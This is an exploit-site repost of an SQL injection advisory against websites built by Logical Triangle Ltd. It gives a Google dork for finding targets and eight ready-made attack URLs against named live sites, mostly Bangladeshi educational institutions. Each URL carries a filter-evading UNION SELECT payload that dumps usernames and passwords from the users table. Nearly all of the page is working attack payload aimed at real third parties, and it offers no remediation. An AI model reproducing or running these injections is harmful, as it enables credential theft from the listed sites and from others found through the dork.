Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030015

Below is a copy:

Logical Triangle Ltd - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Logical Triangle Ltd - Sql Injection Vulnerability
#Date: 2022-03-02
#Exploit Author: Behrouz Mansoori
#Google Dork: "Development by: Logical Triangle Ltd."
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Development by: Logical Triangle Ltd."

Admin Page:
target.com/admin


### Demo :

http://www.manikgonjnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://dgnm.logicaltriangle.co/notice_details.php?lang=en&notic_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://www.chattagramnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://dhakanc.edu.bd/latest-news.php?lang=en&news_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://www.consbn.edu.bd/gallery.php?lang=en&cat_id=39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://www.dinajpurnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://www.mymenshinghnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

http://www.sylhetnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.